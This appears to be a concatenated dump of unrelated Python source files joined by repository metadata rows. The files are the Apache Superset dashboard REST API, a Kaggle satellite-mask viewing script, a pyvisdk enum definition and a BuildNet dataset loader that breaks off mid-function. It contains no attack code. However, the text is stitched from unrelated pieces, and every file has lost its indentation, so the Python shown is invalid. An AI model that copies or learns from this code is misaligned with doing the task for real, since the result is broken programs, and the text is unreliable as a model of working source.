# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import logging
from datetime import datetime
from io import BytesIO
from typing import Any, Optional
from zipfile import is_zipfile, ZipFile
from flask import g, make_response, redirect, request, Response, send_file, url_for
from flask_appbuilder.api import expose, protect, rison, safe
from flask_appbuilder.hooks import before_request
from flask_appbuilder.models.sqla.interface import SQLAInterface
from flask_babel import ngettext
from marshmallow import ValidationError
from werkzeug.wrappers import Response as WerkzeugResponse
from werkzeug.wsgi import FileWrapper
from superset import is_feature_enabled, thumbnail_cache
from superset.charts.schemas import ChartEntityResponseSchema
from superset.commands.importers.exceptions import NoValidFilesFoundError
from superset.commands.importers.v1.utils import get_contents_from_bundle
from superset.constants import MODEL_API_RW_METHOD_PERMISSION_MAP, RouteMethod
from superset.dashboards.commands.bulk_delete import BulkDeleteDashboardCommand
from superset.dashboards.commands.create import CreateDashboardCommand
from superset.dashboards.commands.delete import DeleteDashboardCommand
from superset.dashboards.commands.exceptions import (
DashboardBulkDeleteFailedError,
DashboardCreateFailedError,
DashboardDeleteFailedError,
DashboardForbiddenError,
DashboardInvalidError,
DashboardNotFoundError,
DashboardUpdateFailedError,
)
from superset.dashboards.commands.export import ExportDashboardsCommand
from superset.dashboards.commands.importers.dispatcher import ImportDashboardsCommand
from superset.dashboards.commands.update import UpdateDashboardCommand
from superset.dashboards.dao import DashboardDAO
from superset.dashboards.filters import (
DashboardAccessFilter,
DashboardFavoriteFilter,
DashboardTitleOrSlugFilter,
FilterRelatedRoles,
)
from superset.dashboards.schemas import (
DashboardDatasetSchema,
DashboardGetResponseSchema,
DashboardPostSchema,
DashboardPutSchema,
get_delete_ids_schema,
get_export_ids_schema,
get_fav_star_ids_schema,
GetFavStarIdsSchema,
openapi_spec_methods_override,
thumbnail_query_schema,
)
from superset.extensions import event_logger
from superset.models.dashboard import Dashboard
from superset.tasks.thumbnails import cache_dashboard_thumbnail
from superset.utils.cache import etag_cache
from superset.utils.screenshots import DashboardScreenshot
from superset.utils.urls import get_url_path
from superset.views.base import generate_download_headers
from superset.views.base_api import (
BaseSupersetModelRestApi,
RelatedFieldFilter,
statsd_metrics,
)
from superset.views.filters import FilterRelatedOwners
logger = logging.getLogger(__name__)
class DashboardRestApi(BaseSupersetModelRestApi):
datamodel = SQLAInterface(Dashboard)
@before_request(only=["thumbnail"])
def ensure_thumbnails_enabled(self) -> Optional[Response]:
if not is_feature_enabled("THUMBNAILS"):
return self.response_404()
return None
include_route_methods = RouteMethod.REST_MODEL_VIEW_CRUD_SET | {
RouteMethod.EXPORT,
RouteMethod.IMPORT,
RouteMethod.RELATED,
"bulk_delete", # not using RouteMethod since locally defined
"favorite_status",
"get_charts",
"get_datasets",
"thumbnail",
}
resource_name = "dashboard"
allow_browser_login = True
class_permission_name = "Dashboard"
method_permission_name = MODEL_API_RW_METHOD_PERMISSION_MAP
list_columns = [
"id",
"published",
"status",
"slug",
"url",
"css",
"position_json",
"json_metadata",
"thumbnail_url",
"changed_by.first_name",
"changed_by.last_name",
"changed_by.username",
"changed_by.id",
"changed_by_name",
"changed_by_url",
"changed_on_utc",
"changed_on_delta_humanized",
"created_by.first_name",
"created_by.id",
"created_by.last_name",
"dashboard_title",
"owners.id",
"owners.username",
"owners.first_name",
"owners.last_name",
"roles.id",
"roles.name",
]
list_select_columns = list_columns + ["changed_on", "changed_by_fk"]
order_columns = [
"changed_by.first_name",
"changed_on_delta_humanized",
"created_by.first_name",
"dashboard_title",
"published",
]
add_columns = [
"dashboard_title",
"slug",
"owners",
"roles",
"position_json",
"css",
"json_metadata",
"published",
]
edit_columns = add_columns
search_columns = (
"created_by",
"changed_by",
"dashboard_title",
"id",
"owners",
"published",
"roles",
"slug",
)
search_filters = {
"dashboard_title": [DashboardTitleOrSlugFilter],
"id": [DashboardFavoriteFilter],
}
base_order = ("changed_on", "desc")
add_model_schema = DashboardPostSchema()
edit_model_schema = DashboardPutSchema()
chart_entity_response_schema = ChartEntityResponseSchema()
dashboard_get_response_schema = DashboardGetResponseSchema()
dashboard_dataset_schema = DashboardDatasetSchema()
base_filters = [["id", DashboardAccessFilter, lambda: []]]
order_rel_fields = {
"slices": ("slice_name", "asc"),
"owners": ("first_name", "asc"),
"roles": ("name", "asc"),
}
related_field_filters = {
"owners": RelatedFieldFilter("first_name", FilterRelatedOwners),
"roles": RelatedFieldFilter("name", FilterRelatedRoles),
"created_by": RelatedFieldFilter("first_name", FilterRelatedOwners),
}
allowed_rel_fields = {"owners", "roles", "created_by"}
openapi_spec_tag = "Dashboards"
""" Override the name set for this collection of endpoints """
openapi_spec_component_schemas = (
ChartEntityResponseSchema,
DashboardGetResponseSchema,
DashboardDatasetSchema,
GetFavStarIdsSchema,
)
apispec_parameter_schemas = {
"get_delete_ids_schema": get_delete_ids_schema,
"get_export_ids_schema": get_export_ids_schema,
"thumbnail_query_schema": thumbnail_query_schema,
"get_fav_star_ids_schema": get_fav_star_ids_schema,
}
openapi_spec_methods = openapi_spec_methods_override
""" Overrides GET methods OpenApi descriptions """
def __repr__(self) -> str:
"""Deterministic string representation of the API instance for etag_cache."""
return "Superset.dashboards.api.DashboardRestApi@v{}{}".format(
self.appbuilder.app.config["VERSION_STRING"],
self.appbuilder.app.config["VERSION_SHA"],
)
@etag_cache(
get_last_modified=lambda _self, id_or_slug: DashboardDAO.get_dashboard_changed_on( # pylint: disable=line-too-long
id_or_slug
),
max_age=0,
raise_for_access=lambda _self, id_or_slug: DashboardDAO.get_by_id_or_slug(
id_or_slug
),
skip=lambda _self, id_or_slug: not is_feature_enabled("DASHBOARD_CACHE"),
)
@expose("/<id_or_slug>", methods=["GET"])
@protect()
@safe
@statsd_metrics
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.get",
log_to_statsd=False,
)
def get(self, id_or_slug: str) -> Response:
"""Gets a dashboard
---
get:
description: >-
Get a dashboard
parameters:
- in: path
schema:
type: string
name: id_or_slug
description: Either the id of the dashboard, or its slug
responses:
200:
description: Dashboard
content:
application/json:
schema:
type: object
properties:
result:
$ref: '#/components/schemas/DashboardGetResponseSchema'
302:
description: Redirects to the current digest
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
404:
$ref: '#/components/responses/404'
"""
# pylint: disable=arguments-differ
try:
dash = DashboardDAO.get_by_id_or_slug(id_or_slug)
result = self.dashboard_get_response_schema.dump(dash)
return self.response(200, result=result)
except DashboardNotFoundError:
return self.response_404()
@etag_cache(
get_last_modified=lambda _self, id_or_slug: DashboardDAO.get_dashboard_and_datasets_changed_on( # pylint: disable=line-too-long
id_or_slug
),
max_age=0,
raise_for_access=lambda _self, id_or_slug: DashboardDAO.get_by_id_or_slug(
id_or_slug
),
skip=lambda _self, id_or_slug: not is_feature_enabled("DASHBOARD_CACHE"),
)
@expose("/<id_or_slug>/datasets", methods=["GET"])
@protect()
@safe
@statsd_metrics
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.get_datasets",
log_to_statsd=False,
)
def get_datasets(self, id_or_slug: str) -> Response:
"""Gets a dashboard's datasets
---
get:
description: >-
Returns a list of a dashboard's datasets. Each dataset includes only
the information necessary to render the dashboard's charts.
parameters:
- in: path
schema:
type: string
name: id_or_slug
description: Either the id of the dashboard, or its slug
responses:
200:
description: Dashboard dataset definitions
content:
application/json:
schema:
type: object
properties:
result:
type: array
items:
$ref: '#/components/schemas/DashboardDatasetSchema'
302:
description: Redirects to the current digest
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
404:
$ref: '#/components/responses/404'
"""
try:
datasets = DashboardDAO.get_datasets_for_dashboard(id_or_slug)
result = [
self.dashboard_dataset_schema.dump(dataset) for dataset in datasets
]
return self.response(200, result=result)
except DashboardNotFoundError:
return self.response_404()
@etag_cache(
get_last_modified=lambda _self, id_or_slug: DashboardDAO.get_dashboard_and_slices_changed_on( # pylint: disable=line-too-long
id_or_slug
),
max_age=0,
raise_for_access=lambda _self, id_or_slug: DashboardDAO.get_by_id_or_slug(
id_or_slug
),
skip=lambda _self, id_or_slug: not is_feature_enabled("DASHBOARD_CACHE"),
)
@expose("/<id_or_slug>/charts", methods=["GET"])
@protect()
@safe
@statsd_metrics
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.get_charts",
log_to_statsd=False,
)
def get_charts(self, id_or_slug: str) -> Response:
"""Gets the chart definitions for a given dashboard
---
get:
description: >-
Get the chart definitions for a given dashboard
parameters:
- in: path
schema:
type: string
name: id_or_slug
responses:
200:
description: Dashboard chart definitions
content:
application/json:
schema:
type: object
properties:
result:
type: array
items:
$ref: '#/components/schemas/ChartEntityResponseSchema'
302:
description: Redirects to the current digest
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
404:
$ref: '#/components/responses/404'
"""
try:
charts = DashboardDAO.get_charts_for_dashboard(id_or_slug)
result = [self.chart_entity_response_schema.dump(chart) for chart in charts]
if is_feature_enabled("REMOVE_SLICE_LEVEL_LABEL_COLORS"):
# dashboard metadata has dashboard-level label_colors,
# so remove slice-level label_colors from its form_data
for chart in result:
form_data = chart.get("form_data")
form_data.pop("label_colors", None)
return self.response(200, result=result)
except DashboardNotFoundError:
return self.response_404()
@expose("/", methods=["POST"])
@protect()
@safe
@statsd_metrics
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.post",
log_to_statsd=False,
)
def post(self) -> Response:
"""Creates a new Dashboard
---
post:
description: >-
Create a new Dashboard.
requestBody:
description: Dashboard schema
required: true
content:
application/json:
schema:
$ref: '#/components/schemas/{{self.__class__.__name__}}.post'
responses:
201:
description: Dashboard added
content:
application/json:
schema:
type: object
properties:
id:
type: number
result:
$ref: '#/components/schemas/{{self.__class__.__name__}}.post'
302:
description: Redirects to the current digest
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
404:
$ref: '#/components/responses/404'
500:
$ref: '#/components/responses/500'
"""
if not request.is_json:
return self.response_400(message="Request is not JSON")
try:
item = self.add_model_schema.load(request.json)
# This validates custom Schema with custom validations
except ValidationError as error:
return self.response_400(message=error.messages)
try:
new_model = CreateDashboardCommand(g.user, item).run()
return self.response(201, id=new_model.id, result=item)
except DashboardInvalidError as ex:
return self.response_422(message=ex.normalized_messages())
except DashboardCreateFailedError as ex:
logger.error(
"Error creating model %s: %s",
self.__class__.__name__,
str(ex),
exc_info=True,
)
return self.response_422(message=str(ex))
@expose("/<pk>", methods=["PUT"])
@protect()
@safe
@statsd_metrics
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.put",
log_to_statsd=False,
)
def put(self, pk: int) -> Response:
"""Changes a Dashboard
---
put:
description: >-
Changes a Dashboard.
parameters:
- in: path
schema:
type: integer
name: pk
requestBody:
description: Dashboard schema
required: true
content:
application/json:
schema:
$ref: '#/components/schemas/{{self.__class__.__name__}}.put'
responses:
200:
description: Dashboard changed
content:
application/json:
schema:
type: object
properties:
id:
type: number
result:
$ref: '#/components/schemas/{{self.__class__.__name__}}.put'
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
403:
$ref: '#/components/responses/403'
404:
$ref: '#/components/responses/404'
422:
$ref: '#/components/responses/422'
500:
$ref: '#/components/responses/500'
"""
if not request.is_json:
return self.response_400(message="Request is not JSON")
try:
item = self.edit_model_schema.load(request.json)
# This validates custom Schema with custom validations
except ValidationError as error:
return self.response_400(message=error.messages)
try:
changed_model = UpdateDashboardCommand(g.user, pk, item).run()
response = self.response(200, id=changed_model.id, result=item)
except DashboardNotFoundError:
response = self.response_404()
except DashboardForbiddenError:
response = self.response_403()
except DashboardInvalidError as ex:
return self.response_422(message=ex.normalized_messages())
except DashboardUpdateFailedError as ex:
logger.error(
"Error updating model %s: %s",
self.__class__.__name__,
str(ex),
exc_info=True,
)
response = self.response_422(message=str(ex))
return response
@expose("/<pk>", methods=["DELETE"])
@protect()
@safe
@statsd_metrics
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.delete",
log_to_statsd=False,
)
def delete(self, pk: int) -> Response:
"""Deletes a Dashboard
---
delete:
description: >-
Deletes a Dashboard.
parameters:
- in: path
schema:
type: integer
name: pk
responses:
200:
description: Dashboard deleted
content:
application/json:
schema:
type: object
properties:
message:
type: string
401:
$ref: '#/components/responses/401'
403:
$ref: '#/components/responses/403'
404:
$ref: '#/components/responses/404'
422:
$ref: '#/components/responses/422'
500:
$ref: '#/components/responses/500'
"""
try:
DeleteDashboardCommand(g.user, pk).run()
return self.response(200, message="OK")
except DashboardNotFoundError:
return self.response_404()
except DashboardForbiddenError:
return self.response_403()
except DashboardDeleteFailedError as ex:
logger.error(
"Error deleting model %s: %s",
self.__class__.__name__,
str(ex),
exc_info=True,
)
return self.response_422(message=str(ex))
@expose("/", methods=["DELETE"])
@protect()
@safe
@statsd_metrics
@rison(get_delete_ids_schema)
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.bulk_delete",
log_to_statsd=False,
)
def bulk_delete(self, **kwargs: Any) -> Response:
"""Delete bulk Dashboards
---
delete:
description: >-
Deletes multiple Dashboards in a bulk operation.
parameters:
- in: query
name: q
content:
application/json:
schema:
$ref: '#/components/schemas/get_delete_ids_schema'
responses:
200:
description: Dashboard bulk delete
content:
application/json:
schema:
type: object
properties:
message:
type: string
401:
$ref: '#/components/responses/401'
403:
$ref: '#/components/responses/403'
404:
$ref: '#/components/responses/404'
422:
$ref: '#/components/responses/422'
500:
$ref: '#/components/responses/500'
"""
item_ids = kwargs["rison"]
try:
BulkDeleteDashboardCommand(g.user, item_ids).run()
return self.response(
200,
message=ngettext(
"Deleted %(num)d dashboard",
"Deleted %(num)d dashboards",
num=len(item_ids),
),
)
except DashboardNotFoundError:
return self.response_404()
except DashboardForbiddenError:
return self.response_403()
except DashboardBulkDeleteFailedError as ex:
return self.response_422(message=str(ex))
@expose("/export/", methods=["GET"])
@protect()
@safe
@statsd_metrics
@rison(get_export_ids_schema)
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.export",
log_to_statsd=False,
)
def export(self, **kwargs: Any) -> Response:
"""Export dashboards
---
get:
description: >-
Exports multiple Dashboards and downloads them as YAML files.
parameters:
- in: query
name: q
content:
application/json:
schema:
$ref: '#/components/schemas/get_export_ids_schema'
responses:
200:
description: Dashboard export
content:
text/plain:
schema:
type: string
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
404:
$ref: '#/components/responses/404'
422:
$ref: '#/components/responses/422'
500:
$ref: '#/components/responses/500'
"""
requested_ids = kwargs["rison"]
if is_feature_enabled("VERSIONED_EXPORT"):
token = request.args.get("token")
timestamp = datetime.now().strftime("%Y%m%dT%H%M%S")
root = f"dashboard_export_{timestamp}"
filename = f"{root}.zip"
buf = BytesIO()
with ZipFile(buf, "w") as bundle:
try:
for file_name, file_content in ExportDashboardsCommand(
requested_ids
).run():
with bundle.open(f"{root}/{file_name}", "w") as fp:
fp.write(file_content.encode())
except DashboardNotFoundError:
return self.response_404()
buf.seek(0)
response = send_file(
buf,
mimetype="application/zip",
as_attachment=True,
attachment_filename=filename,
)
if token:
response.set_cookie(token, "done", max_age=600)
return response
query = self.datamodel.session.query(Dashboard).filter(
Dashboard.id.in_(requested_ids)
)
query = self._base_filters.apply_all(query)
ids = [item.id for item in query.all()]
if not ids:
return self.response_404()
export = Dashboard.export_dashboards(ids)
resp = make_response(export, 200)
resp.headers["Content-Disposition"] = generate_download_headers("json")[
"Content-Disposition"
]
return resp
@expose("/<pk>/thumbnail/<digest>/", methods=["GET"])
@protect()
@safe
@rison(thumbnail_query_schema)
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.thumbnail",
log_to_statsd=False,
)
def thumbnail(self, pk: int, digest: str, **kwargs: Any) -> WerkzeugResponse:
"""Get Dashboard thumbnail
---
get:
description: >-
Compute async or get already computed dashboard thumbnail from cache.
parameters:
- in: path
schema:
type: integer
name: pk
- in: path
name: digest
description: A hex digest that makes this dashboard unique
schema:
type: string
- in: query
name: q
content:
application/json:
schema:
$ref: '#/components/schemas/thumbnail_query_schema'
responses:
200:
description: Dashboard thumbnail image
content:
image/*:
schema:
type: string
format: binary
202:
description: Thumbnail does not exist on cache, fired async to compute
content:
application/json:
schema:
type: object
properties:
message:
type: string
401:
$ref: '#/components/responses/401'
404:
$ref: '#/components/responses/404'
422:
$ref: '#/components/responses/422'
500:
$ref: '#/components/responses/500'
"""
dashboard = self.datamodel.get(pk, self._base_filters)
if not dashboard:
return self.response_404()
dashboard_url = get_url_path(
"Superset.dashboard", dashboard_id_or_slug=dashboard.id
)
# If force, request a screenshot from the workers
if kwargs["rison"].get("force", False):
cache_dashboard_thumbnail.delay(dashboard_url, dashboard.digest, force=True)
return self.response(202, message="OK Async")
# fetch the dashboard screenshot using the current user and cache if set
screenshot = DashboardScreenshot(
dashboard_url, dashboard.digest
).get_from_cache(cache=thumbnail_cache)
# If the screenshot does not exist, request one from the workers
if not screenshot:
self.incr_stats("async", self.thumbnail.__name__)
cache_dashboard_thumbnail.delay(dashboard_url, dashboard.digest, force=True)
return self.response(202, message="OK Async")
# If digests
if dashboard.digest != digest:
self.incr_stats("redirect", self.thumbnail.__name__)
return redirect(
url_for(
f"{self.__class__.__name__}.thumbnail",
pk=pk,
digest=dashboard.digest,
)
)
self.incr_stats("from_cache", self.thumbnail.__name__)
return Response(
FileWrapper(screenshot), mimetype="image/png", direct_passthrough=True
)
@expose("/favorite_status/", methods=["GET"])
@protect()
@safe
@statsd_metrics
@rison(get_fav_star_ids_schema)
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}"
f".favorite_status",
log_to_statsd=False,
)
def favorite_status(self, **kwargs: Any) -> Response:
"""Favorite Stars for Dashboards
---
get:
description: >-
Check favorited dashboards for current user
parameters:
- in: query
name: q
content:
application/json:
schema:
$ref: '#/components/schemas/get_fav_star_ids_schema'
responses:
200:
description:
content:
application/json:
schema:
$ref: "#/components/schemas/GetFavStarIdsSchema"
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
404:
$ref: '#/components/responses/404'
500:
$ref: '#/components/responses/500'
"""
requested_ids = kwargs["rison"]
dashboards = DashboardDAO.find_by_ids(requested_ids)
if not dashboards:
return self.response_404()
favorited_dashboard_ids = DashboardDAO.favorited_ids(
dashboards, g.user.get_id()
)
res = [
{"id": request_id, "value": request_id in favorited_dashboard_ids}
for request_id in requested_ids
]
return self.response(200, result=res)
@expose("/import/", methods=["POST"])
@protect()
@statsd_metrics
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.import_",
log_to_statsd=False,
)
def import_(self) -> Response:
"""Import dashboard(s) with associated charts/datasets/databases
---
post:
requestBody:
required: true
content:
multipart/form-data:
schema:
type: object
properties:
formData:
description: upload file (ZIP or JSON)
type: string
format: binary
passwords:
description: JSON map of passwords for each file
type: string
overwrite:
description: overwrite existing databases?
type: boolean
responses:
200:
description: Dashboard import result
content:
application/json:
schema:
type: object
properties:
message:
type: string
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
422:
$ref: '#/components/responses/422'
500:
$ref: '#/components/responses/500'
"""
upload = request.files.get("formData")
if not upload:
return self.response_400()
if is_zipfile(upload):
with ZipFile(upload) as bundle:
contents = get_contents_from_bundle(bundle)
else:
upload.seek(0)
contents = {upload.filename: upload.read()}
if not contents:
raise NoValidFilesFoundError()
passwords = (
json.loads(request.form["passwords"])
if "passwords" in request.form
else None
)
overwrite = request.form.get("overwrite") == "true"
command = ImportDashboardsCommand(
contents, passwords=passwords, overwrite=overwrite
)
command.run()
return self.response(200, message="OK")
| [
"noreply@github.com"
] | noreply@github.com |
2ded6d1331e6c08a950ed3425fae0dc00936f50f | ed842d4a85d16e9248fe54a018fde1e781b885d5 | /view_masks.py | b5e84dc0a6e433f9a42587e8ea54ae9c165f953b | [] | no_license | jmargieh/kaggle_dstl_satellite | cd0cede9978014d7743a38d6c2884494b6b720ca | 9e60ea20d2edd861c8585f149d1b6ebca2bb891a | refs/heads/master | 2020-03-27T00:09:00.809288 | 2017-04-28T00:52:51 | 2017-04-28T00:52:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,948 | py | import logging
import os
import numpy as np
import cv2
from config import IMAGES_METADATA_FILENAME, IMAGES_PREDICTION_MASK_DIR, \
IMAGES_MASKS_FILENAME, IMAGES_NORMALIZED_DATA_DIR, IMAGES_NORMALIZED_M_FILENAME, \
IMAGES_NORMALIZED_SHARPENED_FILENAME, IMAGES_MEANS_STDS_FILENAME, CLASSES_NAMES
from config import IMAGES_METADATA_POLYGONS_FILENAME
from create_submission import create_image_polygons
from utils.data import load_pickle, get_train_test_images_ids
from utils.matplotlib import matplotlib_setup, plot_image, plot_polygons, plot_two_masks
from utils.polygon import jaccard_coef, create_mask_from_polygons, simplify_mask, stack_masks
def main(kind):
logging.basicConfig(
level=logging.INFO, format="%(asctime)s : %(levelname)s : %(module)s : %(message)s", datefmt="%d-%m-%Y %H:%M:%S"
)
matplotlib_setup()
images_data = load_pickle(IMAGES_NORMALIZED_SHARPENED_FILENAME)
logging.info('Images: %s', len(images_data))
images_masks = load_pickle(IMAGES_MASKS_FILENAME)
logging.info('Masks: %s', len(images_masks))
images_metadata = load_pickle(IMAGES_METADATA_FILENAME)
logging.info('Metadata: %s', len(images_metadata))
images_metadata_polygons = load_pickle(IMAGES_METADATA_POLYGONS_FILENAME)
logging.info('Polygons metadata: %s', len(images_metadata_polygons))
mean_sharpened, std_sharpened = load_pickle(IMAGES_MEANS_STDS_FILENAME)
logging.info('Mean: %s, Std: %s', mean_sharpened.shape, std_sharpened.shape)
images_all, images_train, images_test = get_train_test_images_ids()
logging.info('Train: %s, test: %s, all: %s', len(images_train), len(images_test), len(images_all))
if kind == 'test':
target_images = images_test
elif kind == 'train':
target_images = images_train
else:
raise ValueError('Unknown kind: {}'.format(kind))
nb_target_images = len(target_images)
logging.info('Target images: %s - %s', kind, nb_target_images)
nb_classes = len(images_masks[images_train[0]])
classes = np.arange(1, nb_classes + 1)
images_masks_stacked = None
if kind == 'train':
images_masks_stacked = stack_masks(target_images, images_masks, classes)
logging.info('Masks stacked: %s', len(images_masks_stacked))
jaccards = []
jaccards_simplified = []
model_name = 'softmax_pansharpen_tiramisu_small_patch'
for img_idx, img_id in enumerate(target_images):
if img_id != '6040_4_4': # 6010_1_2 6040_4_4 6060_2_3
continue
mask_filename = os.path.join(IMAGES_PREDICTION_MASK_DIR, '{0}_{1}.npy'.format(img_id, model_name))
if not os.path.isfile(mask_filename):
logging.warning('Cannot find masks for image: %s', img_id)
continue
img_data = None
if kind == 'train':
img_data = images_data[img_id] * std_sharpened + mean_sharpened
if kind == 'test':
img_filename = os.path.join(IMAGES_NORMALIZED_DATA_DIR, img_id + '.npy')
img_data = np.load(img_filename)
img_metadata = images_metadata[img_id]
img_mask_pred = np.load(mask_filename)
if kind == 'train':
img_poly_true = images_metadata_polygons[img_id]
img_mask_true = images_masks_stacked[img_id]
else:
img_poly_true = None
img_mask_true = None
# plot_image(img_data[:,:,:3])
img_mask_pred_simplified = simplify_mask(img_mask_pred, kernel_size=5)
# if kind == 'train':
# for i, class_name in enumerate(CLASSES_NAMES):
# if img_mask_true[:,:,i].sum() > 0:
# plot_two_masks(img_mask_true[:,:,i], img_mask_pred[:,:,i],
# titles=['Ground Truth - {}'.format(class_name), 'Prediction - {}'.format(class_name)])
# plot_two_masks(img_mask_pred[:,:,i], img_mask_pred_simplified[:,:,i],
# titles=['Ground Truth - {}'.format(class_name), 'Prediction Simplified - {}'.format(class_name)])
# img_poly_pred = create_image_polygons(img_mask_pred, img_metadata, scale=False)
# plot_polygons(img_data[:,:,:3], img_metadata, img_poly_pred, img_poly_true, title=img_id, show=False)
if kind == 'train':
# convert predicted polygons to mask
jaccard = jaccard_coef(img_mask_pred, img_mask_true)
jaccards.append(jaccard)
jaccard_simplified = jaccard_coef(img_mask_pred_simplified, img_mask_true)
jaccards_simplified.append(jaccard_simplified)
logging.info('Image: %s, jaccard: %s, jaccard simplified: %s', img_id, jaccard, jaccard_simplified)
if kind == 'train':
logging.info('Mean jaccard: %s, Mean jaccard simplified: %s', np.mean(jaccards), np.mean(jaccards_simplified))
import matplotlib.pyplot as plt
plt.show()
if __name__ == '__main__':
kind = 'train'
main(kind)
| [
"jgc128@outlook.com"
] | jgc128@outlook.com |
223e90ab575e13cd7f3190006ae7286362be3c1c | 8da91c26d423bacbeee1163ac7e969904c7e4338 | /pyvisdk/enums/filter_spec_logical_operator.py | 0d78d493fcfffe5fdfb4c421cfc64e4c3a57bc66 | [] | no_license | pexip/os-python-infi-pyvisdk | 5d8f3a3858cdd61fb76485574e74ae525cdc7e25 | 1aadea0afbc306d09f6ecb9af0e683dbbf961d20 | refs/heads/master | 2023-08-28T02:40:28.789786 | 2020-07-16T04:00:53 | 2020-07-16T04:00:53 | 10,032,240 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 234 | py |
########################################
# Automatically generated, do not edit.
########################################
from pyvisdk.thirdparty import Enum
FilterSpecLogicalOperator = Enum(
'logicalAnd',
'logicalOr',
)
| [
"jmb@pexip.com"
] | jmb@pexip.com |
2502f33983700130044447aab3dee9dd8f4027a0 | ae7aa9a720738ca15c3c8d676d840c175b9a35f2 | /GNN/Dataset/buildnet_dataset.py | 3255d673869a94cc04f874484460ee74cdb24cae | [] | no_license | jhzhang2077/buildingnet_dataset | b96693fba45983d92db7c4897e220537b5c627b2 | 45d8cae3c117087eb5d4e55b8b72e0cb395fee21 | refs/heads/main | 2023-08-23T09:22:29.662312 | 2021-10-13T19:12:34 | 2021-10-13T19:12:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,031 | py | import os
import torch
import json
import numpy as np
import GNN.utils.util as util
from torch_geometric.data import Data, InMemoryDataset
from itertools import product
#from torch_geometric.utils import add_self_loops
class BuildnetDataSet(InMemoryDataset):
def __init__(self, root, typeofdata, typeofedge, nodefeature=None, pretrainedtype=None):
self.typeofdata = typeofdata
self.typeofedge = typeofedge
self.nodefeature = nodefeature
self.pretrainedtype = pretrainedtype
self.file_list = []
self.edge_file_paths = []
self.node_file_paths = []
self.label_file_paths = []
super(BuildnetDataSet, self).__init__(root)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
raw_file = open(os.path.join(self.root, self.typeofdata+".txt"),"r")
self.file_list = []
for line in raw_file:
line = line.strip()
self.file_list.append(line)
#self.edge_file_paths.append(os.path.join(self.root, self.typeofedge, line+'_'+self.typeofedge+'.json'))
#self.label_file_paths.append(os.path.join(self.root, "label", line+'_GNNlabel.txt'))
#self.node_file_paths.append(os.path.join(self.root, "node", line+'_node.json'))
raw_file.close()
return self.file_list
@property
def processed_file_names(self):
# what goes in here?
print("already processed")
return [self.typeofdata+'_'+self.typeofedge+'_'+self.nodefeature+'_'+self.pretrainedtype+'_data.pt']
#def __len__(self):
# return len(self.raw_paths)
def download(self):
pass
def process(self):
data_list = []
path = None
name = None
x_list = []
findex = [i for i in range(len(self.file_list))]
for index in range(len(self.file_list)):
fname = self.file_list[index]
print(fname)
label_json = json.load(open(os.path.join(self.root, "label",fname+'_label.json'),"r"))
nodefeature = []
numnodes = 0
if self.nodefeature == 'minkow':
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_minkow_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
numnodes = len(pointnet_torch)
for i in range(numnodes):
nodefeature.append(pointnet_torch[i].float())
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == "node+minkow":
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_minkow_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
node_json = json.load(open(os.path.join(self.root, "node", fname+'_node.json'),"r"))
numnodes = len(node_json)
for i in range(numnodes):
feature = torch.cat((torch.tensor(node_json[str(i)]), pointnet_torch[i].float()))
nodefeature.append(feature)
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == "node+minkownormal":
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_minkownormal_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
node_json = json.load(open(os.path.join(self.root, "node", fname+'_node.json'),"r"))
numnodes = len(node_json)
for i in range(numnodes):
feature = torch.cat((torch.tensor(node_json[str(i)]), pointnet_torch[i].float()))
nodefeature.append(feature)
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == "node+dgcnn":
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_dgcnn_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
node_json = json.load(open(os.path.join(self.root, "node", fname+'_node.json'),"r"))
numnodes = len(node_json)
for i in range(numnodes):
